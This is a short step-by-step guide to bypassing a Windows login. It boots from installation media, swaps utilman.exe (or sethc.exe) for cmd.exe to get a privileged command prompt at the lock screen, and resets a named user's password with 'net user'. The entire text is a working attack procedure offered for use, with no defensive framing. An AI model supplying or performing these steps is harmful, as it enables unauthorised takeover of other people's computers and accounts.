Windows Password Cracking

1. Insert bootable pendrive or cd and boot the computer
2. ON installation screen press shift+f10
3. type diskpart
4. type list volume
5. locate drive in which windows is installed lets say its D:
6. exit
7. d:
8. cd Windows
9. cd system32
10 copy cmd.exe cmd2.exe
11. ren utilman.exe utilman.old
12. ren cmd2.exe utilman.exe
13. exit
14. close the installer and remove bootable media.
15. Open the laptop/pc and on password screen, press ease of access centre in bottom of the screen.
16. cd c:\users
18. locate user name(kanav chadha)
19. net user "kanav chadha" kk
*kk is desired password
20. login with desired password (kk)
that's it. 

Instead of utilman.exe, if you use sethc. exe then at login screen u need to press shift 5times to access command prompt


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